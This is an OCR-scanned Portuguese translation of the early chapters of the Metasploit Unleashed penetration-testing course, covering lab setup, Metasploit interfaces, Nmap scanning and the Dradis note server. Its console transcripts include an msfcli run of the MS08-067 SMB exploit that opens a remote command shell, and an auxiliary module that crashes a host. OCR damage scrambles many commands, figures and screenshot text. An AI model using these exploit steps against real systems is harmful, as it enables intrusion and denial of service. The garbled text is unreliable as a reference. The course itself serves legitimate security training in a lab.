f eel le Se) NOWOL METASPLOIT UNLEASHED - DOMINANDO 0 FRAMEWORK Este treino livre da seguranca de informagao ¢ trazido a vocé em um esforco da comunidade para promover a sensibilizagdo e arrecadar fundos para criancas carentes na Africa Oriental. Através de um esforgo comovente por varios profissionais de seguranga, estamos orgulhosos de apresentar 0 mais completo e aprofundado curso aberto sobre o Metasploit Framework Esta é a versio online gratuita do curso. Se vocé aprecié-lo e achar ttil, pedimos que voce faca uma doacao para o HFC (hackers para Caridade), 4,00 délares vai alimentar uma crianca durante um més, portanto, qualquer contribuigao é bem-vinda. Nés esperamos que vocé aproveite este curso, tanto quanto nés gostamos de fazé-Lo. A versio "completa deste curso inclui um guia em formato PDF (que tem mesmo material que © wiki) e um conjunto de videos em flash que leva-lo embora os médulos. Devido a alteragdes recentes no Metasploit Framework, eo proceso de desenvolvimento em curso, estamos a espera do MSF para estabilizar e ter o seu conjunto completo de recursos para ser implementado. Vamos anunciar a liberaco dos videos MSFU uma vez. que esto prontos, fique atento! © Offensive Security 2009 Traduzido por Rafael TorresMateriais necessarios para 0 curso: Ela deveria vir como nenhuma surpresa que a maioria dos exploits disponiveis na Metasploit Framework sao direcionados contra a Microsoft Windows, assim, a fim de completar a laboratérios do curso é necessétio ter um sistema de alvo para o ataque. Este sistema deve consistir de uma maquina virtual rodando na sua escolha de sistema operacional hospedeiro. Se vocé nio tiver um WindowsXP extra e / ou VMware Workstation certificado, NIST tem um pré-fabricados WinXP maquina virtual disponivel para download no Ambito da Core Desktop Federal de configuracdo do projeto na URL nas referdncias na seco seguinte, Sua FAQ é um bom recurso para se familiarizar com 0 FDCC. Infelizmente, a maquina virtual fornecido pelo NIST é no formato do Microsoft VirtualPC. Além disso, as VMs produzido pelo NIST so projetados e configurados para manter as pessoas que ‘exercem o Metasploit Framework de comprometé-los. Os passos na seccao seguinte ir orientd-lo. através do processo de converter a imagem para VMware VirtualPC formato e extirpando-se os patches e as configuragSes de politica de grupo a partir da imagem. Vocé sera entao capaz de carregar e executar a maquina virtual usando o VMware Player gratuitamente para completar os laboratérios do curso. Embora 0 VMware Converter e VMware Player é "livre", vocé teré que se inscrever para os downloads. No entanto, a virtualizago de aplicagdes e aparelhos so bem vale o registro, se vocé no for j4 um membro atual. Vacé também pode usar 0 VMware Workstation ou outras implementacées do Virtual Infrastructure. Este curso foi criado usando a versio mais recente do tronco svn do Metasploit Framework, que, no momento da redacao deste texto é a verso 3,3-dev. Se vocé estiver usando voltar | faixa 4 como sua plataforma, vocé pode sempre atualizar para a versio mais recente do tronco através da emissio de um "svn up ‘no! / pentest/exploits/framework3 diretério /’. Por tiltimo, se vocé pretende fazer qualquer explorar o desenvolvimento, a VM NIST, sendo uma imagem de estaco de trabalho regular, no tem um depurador instalado. Vocé vai querer instalar OllyDbg ou imunidade Debugger (ou ambos) na sua VM. Pré-requisitos de hardware Antes de mergulhar no maravilhoso mundo do Metasploit Framework é necessario para garantir ‘© nosso hardware vai atender ou exceder alguns requisitos antes de proceder. Isso ajudaré a eliminar muitos problemas antes que eles surjam mais adiante neste documento. Todos os valores listados so estimados ou recomendado. Vocé pode comecar afastado com menos embora o desempenho sera prejudicado. © Offensive Security 2009 Traduzido por Rafael TorresAlguns dos requisites de hardware que devem ser considerados sao: * Espaco no disco rigido ™ Memoria disponivel * Capacidades Processadores * Acesso / Inter Intra-net Espago no Disco Rigido Este ser o maior obstaculo para superar a tributagao. Seja criativo, se voc’ pode ter algunas TimitagSes de espaco de armazenamento. Este proceso pode consumir quase 20 gigabytes de espaco de armazenamento, assim que seja avisado. Isto significa que nao podemos usar uma particio FAT32, uma vez que nao suporta arquivos grandes. Escolha NTFS, ext3 ou algum outro formato. A quantidade recomendada de espaco necessirio é de 40 gigabytes. 730908009 696K //201 T1Le size on aisk 720008009 696K //202 file size on disk 750608008 66KB//203 file size on disk 730000000 GEN //204 file size on disk Yseess603 GSH //205 file size on aisk 277782685 26018 _//zip File size on disk feral 27A0"B //Total space beTore decompression and extraction 5959596432. S786HB_//Extracted inage file size on disk ‘Zedo1004ess "104ssha’ //Per Converted FCC VM on disk 8580034502 81920 //Optional Backtrack “GUEST” HOO Requirements otal cess 37006 122290084 11249 //Wware-converter-4,0.1-161424, tar 92 Syraarséa ‘senve '//Miiare Canverser dnevaties on aise 101875735 9B //\Mhare:Player-2.5-2-105404. 1396. bundle 157286408 «158M //Mware Player Instatted on disk fora a7807ME //See how fast it gets consumed! Se vocé decidiu produzir clones ou instantneos como vocé progressos através deste curso, estes também terd um espaco valioso no seu sistema. Estar vigilante e no ter medo de recuperar 0 espaco conforme a necessidade. Memoria disponivel: Sem fornecer meméria suficiente para o seu anfitriao do convidado e sistemas operacionais que vocé acabard por causar a falha do sistema. Est indo exigir RAM para o seu sistema operacional hospedeiro, bem como a quantidade equivalente de RAM que vocé est dedicando para cada maquina virtual. Use o guia abaixo para ajudé-lo a decidir a quantidade de RAM necessaria para suta situagio. Linux “HOST Hindmal Memory Requirenent's 1B of aysten senory (RAM) Reelistically 268 or more Per Windows "GUEST" Hininel Henory Requirenent's © Offensive Security 2009 Traduzido por Rafael TorresAt least 256 neg: Realistically yytes (NB) of RAN (168 is recomended) // more never hurts! ‘or more with a SHAP file of equal value (optional) icktrack “GUEST” Minimal Memory Requirenent's AT Least 512 megabytes (NB) of RAM (168 is recommended) // more never hurts! Realistically 168 or nore with a SWAP file of equal value Processador: A velocidade do processador é sempre um problema com o hardware, embora datado de hardware antigo pode ser utilizado em outras modas para servir a um propésito melhor. O requisito minimo para bare-VMware Player é um processador de 400MHz ou mais rapido (S00MHz recomendados). Quanto mais poténcia que vocé pode deitar-se, naturalmente, o melhor. Acessibilidade a Internet Isso pode ser resolvido com um cabo catS do seu roteador / switch / hub. Se ndo houver nenhum servidor DHCP na sua rede vocé terd para atribuir enderecos IP estéticos para seu convidado VM's. Uma conexao de rede sem fio pode funcionar tio bem como um cabo Ethernet, no entanto, a degradagao do sinal com a distancia, através de objetos ¢ estruturas limitardo severamente a stia conectividade. Interagindo com o MSF HA muitas interfaces diferentes para o Metasploit Framework, cada um com suas préprias forcas e fraquezas. Como tal, nao ha uma interface perfeita para usar com o MSF, embora o msiconsole a «inica maneira suportada para acessar a maioria das funcionalidades do quadto. Ainda é benéfico, no entanto, ser confortavel com todas as interfaces que MSF oferece. préximo médulo iré fornecer uma visdo geral das diversas interfaces, juntamente com alguns de discussio onde cada um é melhor aproveitado, Msfconsole © Offensive Security 2009 Traduzido por Rafael TorresSO Session Edit View Bookmarks Settings Help eat rioters er ath to Cie ae @ Shell O msfconsole é provavelmente o mais popular interface para a MSP. Ele fomece uma “all-in one" console centralizado e permite um acesso eficiente a praticamente todas as opgées disponiveis no Metasploit Framework. Msfconsole pode parecer intimidante no inicio, mas depois que vocé aprender a sintaxe dos comandos que vocé vai aprender a apreciar o poder de utilizar esta interface. O msfconsole interface ira funcionar no Windows com o langamento 3.3, contudo, os utilizadores terd que quer instalar manualmente o quadro em Cygwin, juntamente com a instalagio da versio 3. do patch Ruby, ou acessar 0 console emulador através da web ou incluidos os componentes GUL Beneficios do msfconsole: ™ £ 0 tinico caminho de acesso com suporte para a maioria dos recursos no Metasploit. * Fornece uma interface baseada em console para o quadro * Contém a maioria dos recursos e é a mais estavel interface MSF * Suporte completo readline, tabulago e conchuséo de comando ecugo de comandos externos msiconsole é possivel: asf > ping -c 1 192.168.1.2 [+] exec: ping -c 1 192.168.1.2 PING 192.168.1.2 (192.168.1.2) 56(84) bytes of date 64 bytes from 192.168.1.2: ienp_seq=l ttl=128 tine= ~ 192.168.1.2 ping statistics 1 packets transmitted, 1 received, 0% packet loss, time ons Ft min/avg/max/edev ~ 10,308/19,308/16.306/0.600 ‘ns nsf > Obter Ajuda Entrando ajuda ‘ou um’? ' no comando prompt msf iré mostrar uma lista de comandos disponiveis juntamente com uma descrigao do que eles so usados, © Offensive Security 2009 Traduzido por Rafael Torres> help Core Connands banner cd connect exit Description Help menu Nove back from the current context Display an avesore metasploit banner Change the current working directory Communicate with « host Exit the console Help menu Displays information about one or more module Drop into irb scripting mode Displays and manages jobs ‘2 framework plugin rrches for and loads modules from = path Exit the console Fesource Run the connands stored ina file sessnip Guia completo ‘Uma das caracteristicas mais titeis do msfconsole é a conclusio de tabulago. Com a vasta gama de médulos disponiveis, pode ser dificil lembrar exatamente 0 nome eo caminho do médulo especifico que vocé deseja utilizar. Como a maioria dos outros shells, entrando © que vocé sabe e pressionando "Tab" ira apresentar uma lista de opgGes para vocé ou auto-completa seqiiéncia de se existir apenas uma opcio. mst use use use use use use nsf > use exploit/windows/smb/ns exploit/windows/smb/ms03_049_netapi exploit/windows/smb/ms04_007_kiltbitt exploit/windows /smb/ms04_011_lsass exploit/windows /smb/ms04_031_netdde exploit/windows/smb/ms05_039_pnp exploit/windows /smb/ms06_025_rasmans_reg exploit/windows//smb/ns06_025_rras exploit/windows /smb/ms06_040_netapi exploit/windows /smb/ms06_066_nwapi exploit/windows /smb/ms06_066_nuwks exploit /windows/smb/ms08_067_netapi exploit/windows /smb/msdns_zonename > use exploit/windows/smb/ns08_067_netapi "Show" Command. Entrando show ‘no prompt msfconsole iré mostrar todos os médulos no Metasploit. © Offensive Security 2009 Traduzido por Rafael Torresasf > show Encoders Name Description cnd/generic_sh Generic Shell Variable Substitution Conmand Encoder ‘generic/none The "none" Encoder ‘mipsbe/Longzor XOR Encoder eevsmips Ha uma série de ‘show’ comandos que vocé pode usar, mas 0 que vocé usaré com mais freqiiéncia sio ‘show’ auxiliar’, show exploits "e" show payloads" show auxiliares de Execugio "ira mostrar uma lista de todos os médulos disponiveis auxiliar no Metasploit. médulos auxiliares incluem scanners, médulos de negacao de servico, fuzzers, e muito mais. mmsf > show auxiliary auxiliary Name Description “adinbackupexec/dunp Veritas Backup Exec Windows Renote File Access ‘adnin /backupexec/registry Veritas Backup Exec Server Registry Access ‘admin /eiseo/ios_http_auth bypass Cisco 105 HTTP Unauthorized Administrative Access Naturalmente, exploits ‘show’ serd o comando que voc® est mais interessado em rodar uma vez. em seu niicleo, Metasploit é tudo quanto & exploragio. show Run ‘exploits’ para obter uma listagem de todos os exploits contidos no quadro. sf > show exploits Loits Wane Description aix/rpc_ttdbserverd_reatpath ToolTalk rpc. ttdbserverd _tt_internat_realpath Buffer overflow bsdi/softcart/mercantec_softcart Mercantec Softtart CGT overflow eevsmips ‘show payloads’ vai exibir todos os diferentes payloads para todas as plataformas disponiveis no Metasploit. sf > show payloads © Offensive Security 2009 Traduzido por Rafael TorresDescription AIX Command Shell, Bind TcP Inline o AIX Conmand Shell, Find Port InLine aix/ppc/shell_reverse_tep AIX Command Shell, Reverse TCP Inline ssnipene Como vocé pode ver, ha uma grande quantidade de cargas disponivels. Felizmente, quando vocé est no contexto de uma exploraco particular, executando ‘show payloads’ exibira apenas as cargas que so compativeis com a exploracio particular. Por exemplo, se for um Windows explorar, voc ndo seré mostrado as Linux payloads asf exploit(ns08_067_netapi) > show payloads Compatible payloads Description generic/debug_trap Generic x86 Debug Trap generic/debug_trap /bind_ipv6_tcp Generic x86 Debug Trap, Bind TcP Stager (1Pvé) generic /debug_trap /bind_nonx_tep Generic X86 Debug Trap, Bind TCP Stager (No NX or Win?) snip. Se vocé tiver selecionado um médulo especifico, vocé pode emitir o comando ‘Mostrar opcSes' para exibir as configuraces que esto disponivels e / ou necessérias para o médulo especifico. mnsf exploit (ns08_067_netapi) > show options Hodule options: Name Current Setting Required Description wos yes The target address RPORT 445 yes Set the SMB service port SMEPIPE BROWSER yes ‘The pape nane to use’ (BROWSER, SRVSUC) Exploit target: 1d Hane © Autonatic Targeting Se vocé nio estiver certo se um sistema operacional é vulneravel & exploracao particular, execute 0 comando ‘show targets’ dentro do contexto de um médulo de exploracao para ver quais metas 40 apoiadas. sf exploit (msi |-067_netapi) > show targets © Offensive Security 2009 Traduzido por Rafael TorresExploit targets: 1d Hane © Autonatic Targeting 1 Windows 2000 Universal 2 Windows x 5P6/SPL Universal 3 Windows xP $P2 English (IX) 4 Windows xP SP3 English (x) 5 _ Windows 2003 SPO Universal esnip..- Se vocé deseja que o aperfeicoamento das falhas de seguranga, vocé pode ver as opcdes mais avancadas, executando 'show advanced ", sf exploit(ns08_067_netapi) > show advanced Module advanced options: 5 CHOST it Setting: Description: The local client address Name Current Setting Description; The local client port port “search” Command O msfconsole inclui uma extensa expressdo regular funcionalidade de pesquisa baseado. Se vocé tem uma idéia geral do que vocé est procurando vocé pode procuré-lo através do ‘search’. Na saida abaixo, uma pesquisa est sendo feita para MS Bulletin MS09-011. A func3o de busca iré localizar essa seqiiéncia de referéncias dentro do médulo. Note a convengo de nomenclatura para os médulos Metasploit usa sublinhados versus hifens. gf > search ms09-002 [*] Searching loaded modules for pattern auxiliary Name Description des/windows /seb/ns09_001_ write Microsoft SRV.SYS WritesndX Invalid Dataoffset "info" Command © comando "info" ird fornecer informagées detalhadas sobre um médulo em particular, incluindo todas as opcdes, objectivos, e outras informacdes. [BSE Inte dos jindons aaah _00L write © Offensive Security 2009 Traduzido por Rafael TorresDataoffeet Provided by: jevvallejo “use” Command Quando vocé tiver decidido sobre um médulo especifico para fazer uso, a questio da "utilizagao" de comando para selecioné-lo. sf > use dos/windows/snb/ns88_001_write f auxiliary(ns09_061_urite) > show options Hodute options: Name Current Setting Required Description HOST yes The target address RPORT 445 yes Set the SHE service port nsf auxit ry(ms09_001,write) > "connect" Command Emitindo o contato ‘comando com um endereco IP eo mimero da porta, vocé pode se conectar a um host remoto de dentro msfconsole o mesmo que vocé faria com netcat ou o telnet. maf > connect 192.168.1.1 23 [] Connected to 192.168.2 yovyyy yaya DD-WRT v24 std (c) 2008 Newedia-NET Gnbi Release: 07/27/08 (SVM revision: 10011) y Do-WRT og: “set Command © comando ‘ser’ é usado para configurar as opcdes e configuracdes do médullo que vocé est trabalhando no momento. asf auxiliary (ns09, RHOST => 192,168... nsf auxitiary(ns09 write) > set RHOST 192.168.1.1 write) > show options Hodute options: Name Current Setting Required Desc RWOST 192,168.11 yes The target address RPORT $45 yer Set the SHE service port ption © Offensive Security 2009 Traduzido por Rafael TorresUm recurso adicionado recentemente no Metasploit é a capacidade de definir um codificador para usar em tempo de execugao. Isso é particularmente ttil no desenvolvimento de explorar quando vocé nio esta completamente certo quanto & carga de métodos de codificago que ira trabalhar com ‘um exploit. sf exploit (ns03_067_netapi) > show encoders Compatible encoders Description cnd/generic_sh Generic Shell Variable Substitution Conmand Encoder generic/none The “none” Encoder ‘nipsbe/Longxor XOR Encoder ‘nipsle/longxor XOR Encoder php/base64 PHP Bese6s encoder ppe/Longxor PPC LongxOR Encoder ppe/lengxor_tag PPC LongXOR Encoder Spare/Longxor_tag ‘SPARC DHORD XOR Encoder x64/x0r XOR Encoder x86/alpha_nixed ‘Alphaz Alphanumeric Nixedcase Encoder ipha_upper Alpha2 Alphanuneric Uppercase Encoder x86/avoid_utfE_tolower Avoid UTF8/tolower x86/eall¢_dword_xor Calls Dord XOR Encoder x86/countdoun Single-byte X0R Countdown Encodé x86/fnsteny nov Variable-Length Fnstenv/nov Dword XOR Encoder x86/jnp_calt_additive Polymorphic Junp/Call XOR Additive Feedback Encoder x86 /nonalphe Non-Alpha Encoder x86/nonupper Non-Upper Encoder X86/shikata_ga_na Polymorphic XOR Additive Feedback Encoder x86/unicode nixed Alpha Alphanuneric Unicode Nixedcase Encoder x86/unicode_upper fe Encoder "check" command Nao hé muitos exploits que apoié-lo, mas ha também um ‘check’ opgao que ird verificar se 0 alvo é vulneravel a um particular explorar em vez. de exploré-lo realmente, 1_045_wins) > show options Module options: Name Current Setting Required Description © Offensive Security 2009 Traduzido por Rafael TorresRWOST 192.168.1.114 yes The target address RPORT 42 yes The target port Exploit target: 1d Hane © Windows 2000 English sf exploit(ns04_045_wins) > check [=] Check failed? The connection was refused by the renote host (192.168.1.114:42) Setting Global Variables A fim de salvar um monte de digitagio durante pentest, vocé pode definir variaveis globais dentro msfconsole. Vocé pode fazer isso com o 'setg comando’. Uma vez que estas foram criadas, vocé pode usé-los em como muitos exploits e médulos auxiliares como vocé gosta. Vocé também pode ‘guardé-las para usar na proxima vez que o seu inicio msfconsole. No entanto, a armadilha 6 ‘esquecer que vocé salvou globais, portanto, sempre verifique suas opcdes antes de "corer" ou "explorar". Inversamente, vocé pode usar o ‘unset’ comando para remover tuma variavel global. Nos exemplos que seguem, as varidveis so introduzidas em todas as tampas (ie: LHOST), mas Metasploit é diferencia maitisculas de mimisculas por isso nao é necessério fazé-lo. [asf > setg LOST 192.168.1.102 Host => 192. 168.1.161 nsf > setg RHOSTS 192.168.1.0/24 RHOSTS => 192.168.1.0/24 ‘asf > setg RHOST 192.168.1.136 RHOST => 192,168.1.136 nsf > seve Saved configuration to: /root/.msf3/config nsf > “exploit/run" Commands Ao lancar um exploit, vocé deve emitir a "explorar” comando que, se vocé estiver usando um médulo auxiliar, 0 uso apropriado ¢ ‘run’ apesar de ‘explorar’ vai funcionar tio bem, sf auxiliary(ns09_001, write) > run Attempting to crash the renote host... Lenlow=65535 dateoffset=65535 fillersizes72 © Offensive Security 2009 Traduzido por Rafael Torres"back" Command ‘Uma vez que vocé terminar de trabalhar com um médulo especial, ou se, inadvertidamente, selecione 0 médulo errado, voc pode emit o ‘back’ de comando para mover para fora do contexto atual. [ss0, no entanto, nao é necessério. Assim como vocé pode em roteadores comerciais, voce pode alterar os médulos a partir de outros médulos. Como um lembrete, as variaveis s6 reporte se forem definidas globalmente. nsf auxiliary(ns09_061_write) > back nsf > “resource” Command Alguns ataques como Karmetasploit usar tm arquivo de recurso que vocé pode carregar através do msfconsole usando 0 ‘resource’ de comando. Esses arquivos so um script bésico para msfconsole. Ela executa os comandos no arquivo em sequéncia. Mais tarde, vamos discutir como, fora do Karmetasploit, que pode ser muito ttl. sf > resource karma.re Fesource> load db aqiites ios) [-] The functionality previously provided by this plugin has been [-] integrated into the core command set. Use the new ‘db_driver' [+] command to use a database driver other than sqlite3 (shich {-] J now the default). ALL of the oUd comands are the sone. i Failed to load plugin from /pentest /exploits/franework3/plugins /db_sqlite: resources db. create’ /raot/karna db [*] The specified database already exists, connecting [] Successfully connected t0\ the database (*] File: /reot/karna.db Fesource> se auxiliary/server/browser_autopin Fesource> setg AUTOPI HOST 10.0.0-1 AUTOPHN-HOST => 10,0.0.2 snip. "irb" Command Executando o ‘irb’ comando vocé ira cair em ruby script modo onde vocé pode emitir comandos e criar scripts na mosca. imef > irb [+] Starting IRB shell. >> puts "Hello, metasploit Netto, netasploit! © Offensive Security 2009 Traduzido por Rafael Torresmsfcli Msfcli fornece uma interface de linha de comando poderosa EO Cee) Session Edit View Bookmarks Settings Help yee) ete Ot er ste Cancers) Ur eae 71 esc en ea cried onsen CeCe Steere ee cries vrata) eee ech ste eee Te) pape available ids evasion options for this modu (pats ee Ce gC ee ane ere id rns SEO ee Toone ee ere Ces (Ac) tions PPV e Oeste Claes nctec har Tey once ee gsc re eee cd oreeties enemies me Tied %)| a shell Observe que quando msfcli usando, as varidveis so atribuidos através de "=" e que todas as opgdes sio case-sensitive, rootgbt4: /pentest/exploits/franevork3# . /esfcli windows /smb/ms03_067_netapi RWOST=192.165.1.115 PAYLOAD=windows/sheLt/bind_tep E [+] Please wait while we load the rodule tree, [e] Started’ bind handler [+] Autonatically detecting the target. [] Fingerprint: Windows xP Service Pack 2 - Lang:English [+] Selected Target: Windows XP SP2 English (WX) [+] Triggering the vilnerability [re] Sending stage (474 bytes) T+] Conmand shell session 1 opened (192.168.1,101:54659 -> 192,168.1.115:4444) Nicrosoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Hicrosoft Corp. (C:\WINDOWS\systen32> Se vocé nao esté totalmente certo sobre que opsdes pertencem a um determinado médulo, vocé pode acrescentar a letra 'O’ para o final da string em qualquer ponto que vocé esta preso. rootchts: /pentest /exploits/franevork3# . /xsfcli windows /snb/ms03_067 netapi 0 © Offensive Security 2009 Traduzido por Rafael Torres[+] Please wait while we load the rodule tree. Name Current Setting Required Description HOST yes The target address RPORT 445 yes Set the SMB service port SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) ara exibir as cargas que esto disponiveis para 0 médulo atual, acrescentar a letra 'P’ para a sequéncia de linha de comando. rootgbts: /pentest /exploits/franevork3# . /esfcli windows /smb/ms05_067_netapi RNOST=192.168.1.115 P [+] Please wait while we load the rodule tree, Compatible payloads Description Generate debug trap in the target process As ontras opcdes disponiveis para msfcli estio disponiveis através da emissio de "msfcli h Beneficios da mscli: * Apoia o lancamento de exploits e médulos auxiliares * Util para tarefas especificas * Bom para aprender * Conveniente para usar ao desenvolvimento de um teste ou explorar novas * Boa ferramenta para exploracio one-off * Excelente se vocé sabe exatamente o que explorar e opgdes que vocé precisa * Maravilhoso para usar em scripts e automacao de base tinico inconveniente real de msfcli & que nao é suportado to bem quanto msfconsole e s6 pode lidar com uma concha de cada vez, tornando-se bastante pratico para ataques do lado do cliente. Ele também no suporta nenhum dos recursos avangados de automagao msfconsole. msfgui Msfgui, como o proprio nome sugere, oferece uma interface gréfica para o Metasploit Framework. © Offensive Security 2009 Traduzido por Rafael TorresCOR ‘gystern window Help % Cancel] %fnd|!0b= Jeb IO [Module Djobs » YW Exploits Al loaded exploit modules (396) » Q, Awillary Allloaded auxiiary modules (161) information |Madule Output Sessions Target ype Welcome to the Metasploit Framework GUI! This interface can be used in either wizard-mode or console-made. To start the viizard, browse to a module inthe list above, and double-click its name. To view the source code of a module, right-click ts name and select the view Code aption. Fyou prefer to work in a msfeonsole interface instead, select the Console aption from the window menu (or just press Control+0). Have fun! Loaded 396 exploits, 239 payloads, 20 encoders, 7 nops, and 181 auxiliary Beneficios da msfgui: * Boa ferramenta para as manifestagGes de clientes e gest3o * Oferece uma interface de apontar e clicar para fins de exploragao * Interface GTK baseada em assistente para usar 0 Metasploit Framework * Suporta uma msfconsole clone via Control + 0 menu de opcSes ou Window-> Console * Arquivo grafico e browser processo quando se utiliza cargas Meterpreter * Emprego Vistial manipulacio e janelas Desvantagem do msfgui sto: * A partir da versio 3.3 do Metasploit Framework, msfgul delxaré de ser mantida * Nio é especialmente estvel e est propenso a falhas msfweb © componente de msfweb metasploit é um multi-user interface ruby-on-rails para o Framework. © Offensive Security 2009 Traduzido por Rafael TorresSS Ble Edit View History Bookmarks Tools Help 9 @ - © * & (Wlrwnz7 00155595, G {)Remote-explott Offensive Security LARE Forums fillmilworm [@)Metasploit » ciote Aunteres —@ Paylonde Bil Coneole ir Seesone MeEGaSP[OiG Beneficios da msfweb: * Suporta varios usuarios, baseados em AJAX msfconsole execucio, cargas, encoders, e muito mais * It é excelente para o fornecimento de gestio ou de sensibilizagio dos utilizadores, demos Desvantagens de incluir msfweb: »* E apenas esporadicamente atualizado * Funciona, mas é um devorador de meméria e pode forgar o browser a um rastejamento * A interface msfweb fornece absolutamente nenhuma seguranga e s6 deve ser usado em redes confidveis Recolha de Informacao A base para qualquer teste de penetrago bem sucedida é a recolha de informagio solida. A incapacidade de realizar a recolha de informacao adequada ter que flailing ao redor aleatoriamente, alacar as maquinas que nao sao vulneravels e outros que estéo faltando. © Offensive Security 2009 Traduzido por Rafael TorresView Bookmarks Settings Help Imsf auxiliary on) > run te Cee CMOS U cor eee Mee Ce Ta BCS ESE UU moc E etm ick: ect tre ee ee eee te er od) i ty Porm en) cei a) treeaecy cre eae Se ee acute nD) 2.168.2.117 Tc earn) (language: Unknown) i Cree Cece emer n Terry i Pe em Crm ret et.) eee) i treesety Sore ore English) 1 Auxiliary module execution completed Premier teat @ Shell Nés préximos capitulos vamos cobrir varios aspectos no Ambito Metasploit que podem ajudar com 0 esforco de coleta de informacées. O Dradis Framework Se vocé estiver executando uma caneta-teste como parte de uma equipe ou esto trabalhando em seu préprio pais, vocé vai querer ser capaz de armazenar seus resultados para a referéncia rapida, compartilhar seus dados com sua equipe, ¢ ajuidar a escrever o seu relatorio final. Uma excelente ferramenta para a realizacao de todos os acima é o quadro Dradis, Dradis é uma estrutura de codigo aberto para compartilhar informacies durante as avaliacdes de seguranca e pode ser encontrado aqui. O quadro Dradis est sendo ativamente desenvolvida com novas funcionalidades sejam adicionadas regularmente. Dradis é muito mais do que apenas um simples pedido de anotago. Comunicar sobre SSL, pode importar arquives Nmap e Nessus resultado, anexar arquivos, gerar relatérios, e pode ser estendido para conectar-se com sistemas externos (por exemplo, a vulnerabilidade do banco de dados). No Backtrack4 vocé pode emitir 0 seguinte comando: root@bt4: apt-get install dradis Uma vez que o Framework foi instalado, podemos agora ir para o diretério e iniciar o servidor root@bt4: cd /pentest /aisc/dradis/server Footbt4: ruby ./script/server = Booting WeBrick... Rails application started on https: //locathost:3004 Cerl-c to shutdonn server; call with --help for options [2009-08-29 13:40:50] INFO WEBrick 1.3.1 [2009-08-29 13:40:50] IFO ruby 1.8.7 (2008. [2009-08-29 13:40:50] IFO 11) (4486-Linux) © Offensive Security 2009 Traduzido por Rafael TorresEnfim, estamos prontos para abrir a interface web Dradis. Navegar para https: / / localhost: 3004 (ose o endereco IP), aceitar 0 aviso de certificado, digite uma senha novo servidor, quando solicitado, e login usando a senha definida no passo anterior. Note que nao ha nomes para definir isso no login, vocé pode usar qualquer nome de login que voc® gosta. Se tudo correr bem, vocé sera presenteado com o espaco de trabalho Dradis principal. dradis v2.3.0 - Mozilla Firefox Ble Edit View History Bookmarks ‘Tools Help SD ~ BS @ Lrrositecatost:3004—~ | [Grp & ‘dradis v2.3.0 logout) 2] ipo trom fie... EQ export + (- addbranch Notes || impor note... || Attachments whats new nth version? Tocalhost:3004 €3 |S) No lado esquerdo vocé pode criar uma estrutura de arvore, Use-o para organizar suas informag6es (por exemplo: hosts, sub-redes, servigos, etc.) No lado direito vocé pode adicionar as informacdes pertinentes a cada elemento (acho notas ou anexos). Antes de iniciar a Dradis console, vod precisard editar o arquivo ‘dradis.xml "para refletir o nome de usuério e senha que vocé definiu quando inicialmente executando o servidor. Este arquivo pode ser localizado no backtrack4 em '/pentest/misc/Dradis/cliente/conf. ‘Vocé pode agora langar 0 console Dradis emitindo o seguinte comando a partir do “pentest misc / Dradis /cliente/diret6rio: © Offensive Security 2009 Traduzido por Rafael Torresrootght4: /pentest/nisc/dradis/client# ruby ./dradis.rb event(s) registered: [:exception] Registered observers: radian Port Scanning Embora ja instalados e configurados Dradis para armazenar nossas notas e resultados, ainda é uma boa pritica criar um novo banco de dados de dentro Metasploit que os dados ainda podem ser titeis para ter répida recuperacao e para uso em situagdes de ataque determinado. nsf > db_create [+] Creating a new database instance... [+] Successfully connected to the dal [+] File: /root/.nsf3/sqlite3 .db sf > Load db_tracker [*] Successfully loaded plugin: db_tracker nsf > help Description ne er more hosts to the database Icnote Add a note to host Add a port to host Autonatically exploit everything Connect to an existing database Drop an existing dat Disconnect fron the current database instance Specify @ database driver List alUhosts in the database db-inport_anap_ntog Inport a THC-Anap scan results file (-o -m) import _nessis_nbe Inport @ Nessus scan result file (NBE) Ginportcnessuscont Inport ¢ Nessus sean reste Fite (NESSUS) dbimport_nmap xsl Inport a Nmap scan results file (-oX) ab_nmap Execut records the output autonaticatly ab-notes List all notes in the datal ab_services List all services in the database ab_vulns: List all vulnerabilities in the database nsf > Podemos usar 0 "db_nmap 'comando para executar uma varredura Nmap contra os nossos objectivos e que os resultados da verificacao armazenados no banco de dados recém criado, no entanto, Metasploit sé iré criar o arquivo de sada XML como que é o formato que ele usa para preencher o banco de dados enquanto que Dradis pode importar tanto a safda para o grep ou normal. E sempre bom ter todas as trés saidas do Nmap (xml, grep e normal), para que possamos executar 0 ‘Nmap digitalizar usando o sinalizador '-0A' para gerar a saida de trés arquivos, em seguida, emitir 0 "db_import_nmap_xml comando ‘para preencher 0 banco de dados do Metasploit . Se vocé nao quiser importar os seus resultados em Dradis, basta executar 0 Nmap usando ‘db_nmap “com as opcdes que vocé usaria normalmente, omitindo-se a bandeira de safda. O exemplo a seguir © Offensive Security 2009 Traduzido por Rafael Torresseria, entGo, "db_nmap-v-sV 192.168.1.0/24. sf > nnap -v -2V 192.168.1.0/24 -of subnet _1 TH] exec: nmap -v -sV 192.168.1.0/24 -oA subnet_a Starting Nmap 5.00 ( http://nmap.org ) at 2009-08-13 19: NSE: Loaded 3 scripts for scanning. Initiating ARP Ping Scan at 19:29 Scanning 101 hosts (1 port/host] licap done: 256 1 addresses (36 hosts up) scanned in 499.43 seconds Row'packets sent 19973" (677.82240) | Rovdl 15133 (oe. 3i20@) Com o scan terminado nés vamos emitir 0 "db_import_nmap_xml 'comando para importar 0 arquivo XML do Nmap. msf > db_import_nmap_xml subnet_1.xml Os Resultados importados podem ser vistos através do db_hosts 'e’ db_services ‘comandos: maf > db_hosts 192,168.1.1 Status: alive 0s: 1921168.1.2 Status: alive 0s: 492, 168:1-10 Status: alive 08: 1921166.1.100 Status: alive 05: 19:39:05 19:39:05 19:39:05 19:39:05 19:39:05 19:39:05 2009 Service: host=192.168.1.1 port=80 prote=tep state=up 19:39:05 2009 Service: host=192. 168. .2 porte25 protostep statezup Agora estamos prontos para Importar os nossos resultados em Dradis mudando para o terminal onde temos a Dradis console em execucao e de emissio do "import nmap ‘de comando, dradis> import nmap /pentest /exploits/franework3/subne! There has been an exception: error] undefined method “each' for nil:Wilclass Ipentest/exploits/franework3/subnet_1.nmap was successfully imported dradis> F_l-nmap normal © Offensive Security 2009 Traduzido por Rafael TorresSe vocé mudar a sua interface web Dradis e atualizar a exibicao, vocé verd os resultados do Nmap importados varredura em um formato facil de navegar em arvore. COUR ERE Ble Edt View History Bookmerks Tools Help D> BO & Lrrvesecahons008 patio ie EQ expat = (gadipaer 2) ) [Frvicns |G eaten Eva cabgars + | uponces es Tet = carony Autor (Gur 